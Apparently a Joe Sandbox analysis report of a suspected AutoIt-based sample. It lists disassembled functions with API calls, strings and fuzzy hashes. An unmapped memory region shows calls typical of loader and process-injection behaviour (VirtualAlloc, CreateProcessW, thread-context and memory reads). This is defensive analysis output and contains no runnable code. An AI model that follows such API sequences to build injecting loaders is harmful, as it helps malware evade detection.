                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t2Z
                                                                                  • API String ID: 2955681530-131526147
                                                                                  • Opcode ID: e67f62d968fb52d315a2742562446a6e04fe91f26ebce46283308fc03bd7c018
                                                                                  • Instruction ID: 9215ef8cda82d5c0e18360ce73c2e83c3dfe73b0cbfe4d64b0395d0decda531d
                                                                                  • Opcode Fuzzy Hash: e67f62d968fb52d315a2742562446a6e04fe91f26ebce46283308fc03bd7c018
                                                                                  • Instruction Fuzzy Hash: 7B919172504306AFDB20EB54C855F9EB7E8BF88314F00486DF95997291DB34EE84CB96

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004F3F86
                                                                                  • RegisterClassExW.USER32(00000030), ref: 004F3FB0
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3FC1
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 004F3FDE
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F3FEE
                                                                                  • LoadIconW.USER32(000000A9), ref: 004F4004
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F4013
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: 01f67d8e60582d42ab15c8645f0b179039d5f481a3cf7b90911a36563df7ea54
                                                                                  • Instruction ID: 73e41eb5ea956e0c29d78cb9f4baae1eb7b201c53ae12f693ab6b30e63214348
                                                                                  • Opcode Fuzzy Hash: 01f67d8e60582d42ab15c8645f0b179039d5f481a3cf7b90911a36563df7ea54
                                                                                  • Instruction Fuzzy Hash: 6421F9B5D00318AFDB80DFA4EC89BCDBBB4FB18700F10421AF515A62A0D7B51588EFA5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0053BDB4: __time64.LIBCMT ref: 0053BDBE
                                                                                    • Part of subcall function 004F4517: _fseek.LIBCMT ref: 004F452F
                                                                                  • __wsplitpath.LIBCMT ref: 0053C083
                                                                                    • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
                                                                                  • _wcscpy.LIBCMT ref: 0053C096
                                                                                  • _wcscat.LIBCMT ref: 0053C0A9
                                                                                  • __wsplitpath.LIBCMT ref: 0053C0CE
                                                                                  • _wcscat.LIBCMT ref: 0053C0E4
                                                                                  • _wcscat.LIBCMT ref: 0053C0F7
                                                                                  • _wcscmp.LIBCMT ref: 0053C03E
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C65D
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C670
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0053C2A1
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0053C338
                                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0053C34E
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0053C35F
                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0053C371
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 2378138488-0
                                                                                  • Opcode ID: 83ebe1e6868fbfa9892e07f89bbafd8be9c031f29a0570c7f0eb9bef75b83d45
                                                                                  • Instruction ID: 893fd5d6f8ad97f83422176bd7ee0205fc1984db6c6ec968b8b63bb38d350278
                                                                                  • Opcode Fuzzy Hash: 83ebe1e6868fbfa9892e07f89bbafd8be9c031f29a0570c7f0eb9bef75b83d45
                                                                                  • Instruction Fuzzy Hash: EFC12AB1900219ABDF11DF95CC85EEEBBB9BF89304F0040AAF609F7151DB749A848F65

                                                                                  Control-flow Graph

                                                                                  (rendered control-flow graph of the function at 4f3742 omitted; legend: Executed / Not Executed)
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004F37B3
                                                                                  • KillTimer.USER32(?,00000001), ref: 004F37DD
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004F3800
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F380B
                                                                                  • CreatePopupMenu.USER32 ref: 004F381F
                                                                                  • PostQuitMessage.USER32(00000000), ref: 004F382E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  • Opcode ID: fb13f75440745a25c7ec86495e1d6f92cd35d60c4dfdee2faf954da0db1a33d8
                                                                                  • Instruction ID: 292d13c91e38bad883299797e587bcb96969bbaced14b4f73cd8987b4e2dac4a
                                                                                  • Opcode Fuzzy Hash: fb13f75440745a25c7ec86495e1d6f92cd35d60c4dfdee2faf954da0db1a33d8
                                                                                  • Instruction Fuzzy Hash: CC4158F510054EA7DB507F38EC4EBBA3EE9FB10342F544216FB01921A0CA68AD44A77E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004F3E79
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004F3E88
                                                                                  • LoadIconW.USER32(00000063), ref: 004F3E9E
                                                                                  • LoadIconW.USER32(000000A4), ref: 004F3EB0
                                                                                  • LoadIconW.USER32(000000A2), ref: 004F3EC2
                                                                                    • Part of subcall function 004F4024: LoadImageW.USER32(004F0000,00000063,00000001,00000010,00000010,00000000), ref: 004F4048
                                                                                  • RegisterClassExW.USER32(?), ref: 004F3F30
                                                                                    • Part of subcall function 004F3F53: GetSysColorBrush.USER32(0000000F), ref: 004F3F86
                                                                                    • Part of subcall function 004F3F53: RegisterClassExW.USER32(00000030), ref: 004F3FB0
                                                                                    • Part of subcall function 004F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3FC1
                                                                                    • Part of subcall function 004F3F53: InitCommonControlsEx.COMCTL32(?), ref: 004F3FDE
                                                                                    • Part of subcall function 004F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F3FEE
                                                                                    • Part of subcall function 004F3F53: LoadIconW.USER32(000000A9), ref: 004F4004
                                                                                    • Part of subcall function 004F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F4013
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  • Opcode ID: 346b925e4660590d2f01785f829663dfe43fd7f1fa0c87fcf302e31b9d56b98f
                                                                                  • Instruction ID: cb99b9cd55dd2cedf4e5b327540cdb12ec75c03a6e2b2654e154ff499462a835
                                                                                  • Opcode Fuzzy Hash: 346b925e4660590d2f01785f829663dfe43fd7f1fa0c87fcf302e31b9d56b98f
                                                                                  • Instruction Fuzzy Hash: FA21B7B0D00308AFCB84DFA9EC59B5ABFF5FB58310F50421AE204A32A0D3755548EF99

                                                                                  Control-flow Graph

                                                                                  (rendered control-flow graph of the function at 15f7968 omitted; legend: Executed / Not Executed)
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015F7A39
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015F7C5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileFreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 204039940-0
                                                                                  • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                  • Instruction ID: e123bd578ff54d9bc9e93826b79cebde48765674124aa9fe5544c7dcd45cbf58
                                                                                  • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                  • Instruction Fuzzy Hash: D4A1E674E00209EBEB14CFA4C894BEEBBB5FF48304F20859DE615BB281D7759A45CB54

Control-flow Graph

control_flow_graph 1130 4f49fb-4f4a25 call 4fbcce RegOpenKeyExW 1133 4f4a2b-4f4a2f 1130->1133 1134 5641cc-5641e3 RegQueryValueExW 1130->1134 1135 564246-56424f RegCloseKey 1134->1135 1136 5641e5-564222 call 50f4ea call 4f47b7 RegQueryValueExW 1134->1136 1141 564224-56423b call 4f6a63 1136->1141 1142 56423d-564245 call 4f47e2 1136->1142 1141->1142 1142->1135
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 004F4A1D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005641DB
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0056421A
• RegCloseKey.ADVAPI32(?), ref: 00564249
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 5a7353f9bd6782f32f6c6b77acf04692ae2a730c49cd3bf1cb02340b9018ff8d
• Instruction ID: b622d9f64d3ed5997e4f731903d1ed1a33da5420c348b9ba89430e19ab988320
• Opcode Fuzzy Hash: 5a7353f9bd6782f32f6c6b77acf04692ae2a730c49cd3bf1cb02340b9018ff8d
• Instruction Fuzzy Hash: F7116D71A00108BEEB00ABA4DD8ADBF7BBCEF15344F101059B506E3191EA75AE45EB60

Control-flow Graph

control_flow_graph 1157 4f36b8-4f3728 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F36E6
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3707
• ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F371B
• ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F3724
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: c29352f760371c535bb96a0c86ebdacaffe599d7e97c27e9559ed178a6f6b64e
• Instruction ID: ab25cd76803afae2d960ee0b632e9adb0e4584107e0138bb96bafa218ab16b46
• Opcode Fuzzy Hash: c29352f760371c535bb96a0c86ebdacaffe599d7e97c27e9559ed178a6f6b64e
• Instruction Fuzzy Hash: C9F030719442D87BE7B067576C1CE672E7DD7D6F20B50011ABA08A21A0C1611889EA78

Control-flow Graph

control_flow_graph 1262 15f76f8-15f786b call 15f5348 call 15f75e8 CreateFileW 1269 15f786d 1262->1269 1270 15f7872-15f7882 1262->1270 1271 15f7922-15f7927 1269->1271 1273 15f7889-15f78a3 VirtualAlloc 1270->1273 1274 15f7884 1270->1274 1275 15f78a7-15f78be ReadFile 1273->1275 1276 15f78a5 1273->1276 1274->1271 1277 15f78c2-15f78fc call 15f7628 call 15f65e8 1275->1277 1278 15f78c0 1275->1278 1276->1271 1283 15f78fe-15f7913 call 15f7678 1277->1283 1284 15f7918-15f7920 ExitProcess 1277->1284 1278->1271 1283->1284 1284->1271
APIs
  • Part of subcall function 015F75E8: Sleep.KERNELBASE(000001F4), ref: 015F75F9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015F7861
Strings
Memory Dump Source
• Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: WCPX2RVAV2TN4C74
• API String ID: 2694422964-3010691817
• Opcode ID: ff88832d3ef15c3e93c81d149843f307b2a604ebe69fa25a3c737e3680d92194
• Instruction ID: cfd83a0efdc95dd5109a89b89b021d85db5d4d21df5e934e03272769082c0ba7
• Opcode Fuzzy Hash: ff88832d3ef15c3e93c81d149843f307b2a604ebe69fa25a3c737e3680d92194
• Instruction Fuzzy Hash: 5C618E30E14249EBEF11DBA4D854BEEBB79EF58300F004599E248BB2C0D7BA5A45CB65

Control-flow Graph

APIs
  • Part of subcall function 004F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005B1148,?,004F61FF,?,00000000,00000001,00000000), ref: 004F5392
  • Part of subcall function 004F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 004F4A1D
• _wcscat.LIBCMT ref: 00562D80
• _wcscat.LIBCMT ref: 00562DB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: _wcscat$FileModuleNameOpen
• String ID: 8![$\$\Include\
• API String ID: 3592542968-2265414088
• Opcode ID: 263dd7d2be540a1725d4fb5f13283f92ca79810f7440cb400a0b5806d7ddc338
• Instruction ID: 1aa3dbd7bda33aa3936d1e5b9191832a46341600002a419272a28756c86a747d
• Opcode Fuzzy Hash: 263dd7d2be540a1725d4fb5f13283f92ca79810f7440cb400a0b5806d7ddc338
• Instruction Fuzzy Hash: 6D5183754043449BC344EF5AE9818ABB7F8FFA9304F404A2EF644932A1DB74A948DB66

APIs
• _memset.LIBCMT ref: 004F522F
• _wcscpy.LIBCMT ref: 004F5283
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F5293
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00563CB0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy
• String ID: Line:
• API String ID: 1053898822-1585850449
• Opcode ID: 1b2fe7c43b656beb86b1e7a3563b30c4a13db778ef4757353f8ea3fe58640207
• Instruction ID: 1455b99fc5d4f8a576757ee798697a683580eba319dc534e1c4bb419aa3cbcf1
• Opcode Fuzzy Hash: 1b2fe7c43b656beb86b1e7a3563b30c4a13db778ef4757353f8ea3fe58640207
• Instruction Fuzzy Hash: 0B31A1714087486BD360EB50EC46BEB7BE8AF54304F00461FF78592191DB78B648CB9A

APIs
  • Part of subcall function 004F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004F39FE,?,00000001), ref: 004F41DB
• _free.LIBCMT ref: 005636B7
• _free.LIBCMT ref: 005636FE
  • Part of subcall function 004FC833: __wsplitpath.LIBCMT ref: 004FC93E
  • Part of subcall function 004FC833: _wcscpy.LIBCMT ref: 004FC953
  • Part of subcall function 004FC833: _wcscat.LIBCMT ref: 004FC968
  • Part of subcall function 004FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 004FC978
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 805182592-1757145024
• Opcode ID: dade6d29f97988e8f64ebfcbbb5220522651b6a0f7a97394d695ae5bfdf2e480
• Instruction ID: e9d5cb6997158ced4e1a5ed8dbd2da6fe5e7dc2f9c8a2161509034b482715355
• Opcode Fuzzy Hash: dade6d29f97988e8f64ebfcbbb5220522651b6a0f7a97394d695ae5bfdf2e480
• Instruction Fuzzy Hash: 9A918F7191021DAFCF04EFA5CC959FEBBB4BF59314F10442AF916AB291DB34AA04CB94

APIs
• _memset.LIBCMT ref: 00563725
• GetOpenFileNameW.COMDLG32 ref: 0056376F
  • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
  • Part of subcall function 004F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004F40C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X$t3Z
• API String ID: 3777226403-3443283496
• Opcode ID: 3ad99be990a01f421e40360452305f88c440f7a6572f83ca3fe5dd88cd4b3f71
• Instruction ID: b8761d8d7e74f3f2c41cdbfb919bc5c892dde5c190ccc01e191015d252e86663
• Opcode Fuzzy Hash: 3ad99be990a01f421e40360452305f88c440f7a6572f83ca3fe5dd88cd4b3f71
• Instruction Fuzzy Hash: 7821A871A1015CAFDF41DFD8D8497EEBBF8AF89304F00405AE505A7241DFB85A898F65

APIs
• __getstream.LIBCMT ref: 005134FE
  • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00513539
• __wopenfile.LIBCMT ref: 00513549
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
• String ID: <G
• API String ID: 1820251861-2138716496
• Opcode ID: 259371f8ff97bd6707890b35579d8ef465040f316044c701ad92f020051698b9
• Instruction ID: 242b7215277eec703dcf4042425023d5e94838f1361e46cc82a5b8f0c27ae264
• Opcode Fuzzy Hash: 259371f8ff97bd6707890b35579d8ef465040f316044c701ad92f020051698b9
• Instruction Fuzzy Hash: 27112770A003079AFB11BF748C466EE3FB5BF89750B158925E814DB181EB70CEC19BA1
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0050D28B,SwapMouseButtons,00000004,?), ref: 0050D2BC
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0050D28B,SwapMouseButtons,00000004,?,?,?,?,0050C865), ref: 0050D2DD
                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0050D28B,SwapMouseButtons,00000004,?,?,?,?,0050C865), ref: 0050D2FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  • API String ID: 3677997916-824357125
                                                                                  • Opcode ID: 4824be3ec107de662e4386496b4ce9d47c874f1bcb27ced36a831e67d065e4b0
                                                                                  • Instruction ID: 5bc23f9b099dee33d7577a8ed752d5d5a18ea0079ed6e24c74238e081689ed67
                                                                                  • Opcode Fuzzy Hash: 4824be3ec107de662e4386496b4ce9d47c874f1bcb27ced36a831e67d065e4b0
                                                                                  • Instruction Fuzzy Hash: F9113979611209BFDB208FA4DC85EEF7BB8FF54744F104869E805D7150E631AE45AB70
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 015F6DA3
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015F6E39
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015F6E5B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                  • Instruction ID: 6c2e67a741cc1c2cc404cd57e9891517a4a61dcb0623a27046ed412260713b64
                                                                                  • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
